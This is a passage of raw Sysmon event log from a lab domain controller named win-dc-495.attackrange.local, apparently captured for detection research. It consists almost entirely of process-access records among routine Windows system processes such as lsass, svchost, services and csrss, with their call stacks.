13:35:50.324{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:50.324{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.914{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.914{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.710{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.710{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.695{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.559{59A5CD1D-8ED0-6005-9300-00000000A301}2476C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{59A5CD1D-8E46-6005-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.554{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:16.429{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9200-00000000A301}2308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 